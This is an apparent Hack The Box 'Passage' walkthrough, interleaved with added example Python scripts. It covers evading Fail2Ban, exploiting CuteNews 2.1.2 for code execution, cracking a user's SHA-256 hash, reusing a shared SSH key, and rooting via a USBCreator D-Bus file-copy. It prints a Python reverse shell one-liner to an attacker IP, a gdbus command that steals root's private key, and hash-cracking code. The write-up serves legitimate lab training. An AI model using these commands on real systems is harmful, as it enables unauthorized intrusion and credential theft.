
HTB Passage Walkthrough
We bypass Fail2Ban by enumerating manually instead of with noisy scanners, and discover a CMS, CuteNews 2.1.2, with a known remote code execution vulnerability that gives us a shell on the server. We then read the web application's files to understand how CuteNews works and find that it stores user records under /CuteNews/cdata/users as Base64-encoded JSON objects containing password hashes. Finally we root the box through a vulnerability in the USBCreator D-Bus interface.
Reconnaissance
We start with an Nmap scan to find the open ports and the services running on the server:
nmap -sT -sC -sV 10.10.10.206
- -sT runs a TCP connect scan
- -sC runs Nmap's default script set
- -sV enumerates service versions

- Port 22 (SSH) is open and runs OpenSSH 7.2p2
- Port 80 (HTTP) is open and runs Apache 2.4.18
I tried to run Gobuster and Nikto, but every time I ran these tools I lost my connection to the server and was blocked for about a minute.

When I continued with manual enumeration and clicked the first article, “**Implemented Fail2Ban**”, I got this page:

They have installed Fail2Ban, an intrusion prevention framework that protects servers from brute-force attacks by watching log files and banning source addresses that generate too many failures. It runs on POSIX systems that have a locally installed packet-control system or firewall, for example iptables or TCP Wrapper.
So we can't brute-force hidden directories or run any other noisy scan without getting banned.
That leaves two options:
- Write a stealthy Python script that brute-forces directories at one request per second (which might take forever).
- Enumerate manually.
For now I'll go with manual enumeration. In the source of the main page I saw that the machine runs a CMS named CuteNews.
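The "stealthy script" option sketched above, as an added example that is not part of the original walkthrough: a rate-limited directory probe that sends one request per configurable delay and stops early when the host goes silent, which is the symptom of Fail2Ban dropping the source address. The wordlist is a constructed stand-in for a real directory list, and the target URL is the box address from the text; `fetch` and `sleep` are injectable so the logic can be exercised without a network.

```python
import time
import urllib.error
import urllib.request

# Constructed wordlist; a real run would load a directory list such as SecLists.
WORDLIST = ["CuteNews", "admin", "images", "backup", "uploads"]


def candidate_urls(base, words):
    """Join each word onto the base URL with exactly one slash between them."""
    base = base.rstrip("/")
    return [f"{base}/{w.strip('/')}" for w in words]


def probe(url, timeout=5):
    """Fetch url once; return its HTTP status, or None if the host is unreachable."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:  # 401/403/404 are still answers
        return e.code
    except urllib.error.URLError:        # refused/timed out: likely banned
        return None


def slow_scan(base, words, delay=1.0, fetch=probe, sleep=time.sleep,
              interesting=(200, 301, 302, 401, 403), stop_on_silent=3):
    """Probe one path per `delay` seconds.

    Returns [(url, status)] for interesting codes. If `stop_on_silent`
    consecutive requests get no answer at all, assume the IP was banned
    and stop instead of burning the rest of the wordlist.
    """
    found, silent = [], 0
    for url in candidate_urls(base, words):
        code = fetch(url)
        if code is None:
            silent += 1
            if silent >= stop_on_silent:
                break
        else:
            silent = 0
            if code in interesting:
                found.append((url, code))
        sleep(delay)
    return found


if __name__ == "__main__":
    for url, code in slow_scan("http://10.10.10.206", WORDLIST):
        print(code, url)
```

One request per second stays under a typical Fail2Ban `maxretry`/`findtime` pair only if the web filter counts 404s at all; the early-stop check is what saves the rest of your session when it does.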

I navigated to
http://10.10.10.206/CuteNews/
and got a login page.
The page reveals the CuteNews version the server is running, 2.1.2. That is useful; we'll come back to it later.

I tried default credentials such as
admin:admin
admin:password
but could not log in, and we know we can't brute-force the login without getting banned. So I clicked Register and created an account.

That gave me a user dashboard. I played around with it looking for a way to upload a shell to the server, but couldn't find one.
Exploitation and gaining access
I checked Exploit-DB for CuteNews 2.1.2 vulnerabilities and found plenty:

As we can see there is a Metasploit module. I tried it and gaining access with it was effortless, but let's set Metasploit aside and download the Python script instead.
So I downloaded the first Python exploit in the list and ran it:

The exploit lets me execute commands on the server.

Then, with a listener waiting on 10.10.14.70:1234, I used a Python reverse shell from PentestMonkey to get a proper shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.70",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And I upgraded the shell to a fully interactive TTY with:
python3 -c 'import pty;pty.spawn("/bin/bash");'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm-256color
I checked for users with a login shell and found paul and nadav.

I tried to enter these users' home directories, /home/nadav and /home/paul, but got permission denied.

Then I started going through the web files to understand how CuteNews works and, with luck, find sensitive data. I discovered that it has a folder named users, which holds the user data Base64-encoded.

The file named “lines” contains all the user records as JSON objects, each encoded in Base64.

I copied its messy content and pasted it into an online Base64 decoder (decoding locally with base64 -d avoids handing target data to a third party).
After decoding the file content I had paul's password, but it was stored as a hash, not in clear text.

Identifying The Hash
I need to identify this hash to know how to crack it, so I used the hash-identifier tool in Kali; it reported a high probability that the hash is SHA-256 (a 64-character hex string is consistent with that).

Cracking The Hash
We paste the hash into a file named paul and use John to crack it:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256 paul

John cracked the hash: the password is atlanta1.
With paul's password we can switch user:
su paul
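The whole chain from the lines file to the password, as an added example covering both the decoding step and the identify-and-crack step above (example code, not from the walkthrough or from CuteNews): decode each Base64 line, walk the JSON for any object carrying a "pass" field, classify the hash by length and charset the way hash-identifier does, and run a dictionary attack with hashlib. The sample lines, the record layout (user name as key, hex SHA-256 in "pass") and the mini wordlist are all constructed for this example.

```python
import base64
import binascii
import hashlib
import json


def _record(user, password):
    """Build one constructed user record in the assumed layout."""
    obj = {user: {"email": f"{user}@example.test",
                  "pass": hashlib.sha256(password.encode()).hexdigest()}}
    return base64.b64encode(json.dumps(obj).encode()).decode()


# Constructed stand-in for the "lines" file: one Base64 JSON object per line,
# plus a junk line to show the parser tolerating garbage.
SAMPLE_LINES = [_record("paul", "atlanta1"),
                _record("nadav", "correct horse battery staple"),
                "not base64!!"]

# Constructed stand-in for rockyou.txt.
WORDLIST = ["123456", "password", "atlanta1", "letmein"]


def decode_line(line):
    """Base64-decode and JSON-parse one line; None if either step fails."""
    try:
        return json.loads(base64.b64decode(line.strip(), validate=True))
    except (binascii.Error, ValueError):
        return None


def collect_hashes(obj, found=None, name=None):
    """Recursively pick up every JSON object that carries a 'pass' field.

    The user name is taken from a 'name' field if present, otherwise from
    the key the object was stored under, so nested layouts still work.
    """
    if found is None:
        found = {}
    if isinstance(obj, dict):
        if isinstance(obj.get("pass"), str):
            found[obj.get("name", name) or "?"] = obj["pass"]
        for key, value in obj.items():
            collect_hashes(value, found, key)
    elif isinstance(obj, list):
        for value in obj:
            collect_hashes(value, found, name)
    return found


def guess_hash_type(h):
    """Length/charset heuristic, the same idea hash-identifier applies."""
    if not h or any(c not in "0123456789abcdefABCDEF" for c in h):
        return "unknown"
    return {32: "raw-md5", 40: "raw-sha1", 64: "raw-sha256",
            128: "raw-sha512"}.get(len(h), "unknown")


def crack_sha256(target, wordlist):
    """Unsalted SHA-256 dictionary attack; returns the word or None."""
    target = target.lower()
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == target:
            return word
    return None


def recover_passwords(lines, wordlist):
    """{user: (hash_type, cracked_or_None)} for every record in `lines`."""
    hashes = {}
    for line in lines:
        obj = decode_line(line)
        if obj is not None:
            collect_hashes(obj, hashes)
    return {user: (guess_hash_type(h),
                   crack_sha256(h, wordlist) if guess_hash_type(h) == "raw-sha256" else None)
            for user, h in hashes.items()}
```

For a real wordlist John is the right tool (its --format=raw-sha256 is exactly the unsalted-SHA-256 guess this script makes); the point here is to see why a 64-hex-character value with no salt prefix is crackable at all.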

After a few hours of enumeration and running privilege-escalation scripts without finding anything useful, I looked in paul's ~/.ssh directory. Reading the authorized_keys file showed that paul and nadav share the same SSH key to log in to the machine.
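The check that turns the hint above into a fact, as an added example that is not part of the original post: parse authorized_keys (including entries with an options prefix such as `command="..."`) and report which entries carry the same key blob as a given id_rsa.pub, along with their comment, which is what reveals the other user. The key blobs and comments below are constructed placeholders, not real keys.

```python
import shlex

# Key types recognised at the start of an authorized_keys entry.
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "sk-ssh-ed25519@openssh.com",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")

# Constructed sample files; "AAAA...CONSTRUCTED" stands in for a real blob.
SAMPLE_ID_RSA_PUB = "ssh-rsa AAAAB3NzaC1yc2E-CONSTRUCTED-1 paul@constructed.test\n"
SAMPLE_AUTHORIZED_KEYS = """\
# constructed authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5-CONSTRUCTED-2 backup@constructed.test
command="/usr/bin/true",no-pty ssh-rsa AAAAB3NzaC1yc2E-CONSTRUCTED-1 nadav@constructed.test
ssh-rsa AAAAB3NzaC1yc2E-CONSTRUCTED-3
"""


def parse_authorized_keys(text):
    """Return [{options, type, blob, comment}] for each non-comment entry."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)          # keeps quoted option values intact
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue                        # malformed line: no key blob
        entries.append({"options": tokens[:idx],
                        "type": tokens[idx],
                        "blob": tokens[idx + 1],
                        "comment": " ".join(tokens[idx + 2:])})
    return entries


def matching_entries(pubkey_text, authorized_text):
    """Entries in authorized_keys whose blob equals the given public key's."""
    pub = parse_authorized_keys(pubkey_text)
    if not pub:
        return []
    return [e for e in parse_authorized_keys(authorized_text)
            if e["blob"] == pub[0]["blob"]]


def shared_key_users(pubkey_text, authorized_text):
    """Comments (typically user@host) of entries that reuse the key."""
    return [e["comment"] for e in matching_entries(pubkey_text, authorized_text)]
```

Comparing the blob rather than the fingerprint avoids shelling out to ssh-keygen; on the box the same information comes from `ssh-keygen -lf` on both files. If the private key has no .pub beside it, `ssh-keygen -y -f id_rsa` regenerates one.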

So I copied the private key “id_rsa” to my machine and set its permissions to 600 (ssh refuses a key file readable by others):
chmod 600 id_rsa
Then I logged in to the machine as nadav with this key:
ssh -i id_rsa nadav@10.10.10.206
And we own the second user, nadav.

Privilege Escalation to root:
In nadav's home directory we see a .viminfo file, which holds vim's session history: recently edited files, file marks and command-line history (this box taught me not to ignore such files when doing privilege escalation).

Inside this file we can see that nadav has been editing some .conf files. I searched for privilege-escalation methods related to these files and came across this article.
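A small .viminfo reader, as an added example that is not part of the original post: it pulls every file path and command vim recorded, with the newest timestamp where the file carries one, so the ".conf files nadav touched" jump out without reading the whole file by eye. The sample below is constructed in the layout vim writes; the paths in it are assumptions for the example, not copied from the box.

```python
import re

# Constructed sample in vim's .viminfo layout.
SAMPLE_VIMINFO = """\
# This viminfo file was generated by Vim 8.0.

# Command Line History (newest to oldest):
:wq
|2,0,1596211700,,"wq"
:q!
|2,0,1596211650,,"q!"

# File marks:
'0  1  0  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
|4,48,1,0,1596211700,"/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf"
'1  3  0  /etc/sudoers
|4,49,3,0,1596211650,"/etc/sudoers"

# Jumplist (newest first):
-'  1  0  /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
|4,-1,1,0,1596211700,"/etc/dbus-1/system.d/com.ubuntu.USBCreator.conf"

# History of marks within files (newest to oldest):

> /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
\t*\t1596211700\t0
\t"\t1\t0

> /etc/sudoers
\t*\t1596211650\t0
\t"\t3\t0
"""

# "|4,mark,line,col,timestamp,"path"" bar lines carry the edit timestamp.
BAR_ENTRY = re.compile(r'^\|4,-?\d+,\d+,\d+,(\d+),"([^"]+)"')
# "> /path" opens a per-file mark history block; "'0  1  0  /path" is a file mark.
MARK_HEADER = re.compile(r"^> (\S.*)$")
FILE_MARK = re.compile(r"^'\d+\s+\d+\s+\d+\s+(\S.*)$")


def recently_edited(viminfo_text):
    """{path: newest_timestamp_or_None} for every file the viminfo mentions."""
    seen = {}
    for line in viminfo_text.splitlines():
        m = BAR_ENTRY.match(line)
        if m:
            ts, path = int(m.group(1)), m.group(2)
            seen[path] = max(seen.get(path) or 0, ts)
            continue
        m = MARK_HEADER.match(line) or FILE_MARK.match(line)
        if m:
            seen.setdefault(m.group(1), None)
    return seen


def command_history(viminfo_text):
    """Ex commands the user ran, newest first (the ':' lines)."""
    return [l[1:] for l in viminfo_text.splitlines() if l.startswith(":")]


def interesting(paths, suffixes=(".conf", "sudoers", ".service", ".sh", "id_rsa")):
    """Filter edited paths down to the ones worth a second look."""
    return sorted(p for p in paths if p.endswith(suffixes))
```

Run it against ~/.viminfo of every user whose home you can read; the same idea applies to .bash_history, .lesshst and .mysql_history.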
It describes the exploit: “A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root — without supplying a password”

Running the following command (nadav has to be in the sudo group, as the description says, and /tmp/rooting must exist first) asks the root-owned USBCreator service to copy /root/.ssh/id_rsa to /tmp/rooting/id_rsa:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/rooting/id_rsa true
This gives us root's private key. After a chmod 600 on the copy, we use it to log in as root over SSH from inside the box:
ssh -i id_rsa root@127.0.0.1
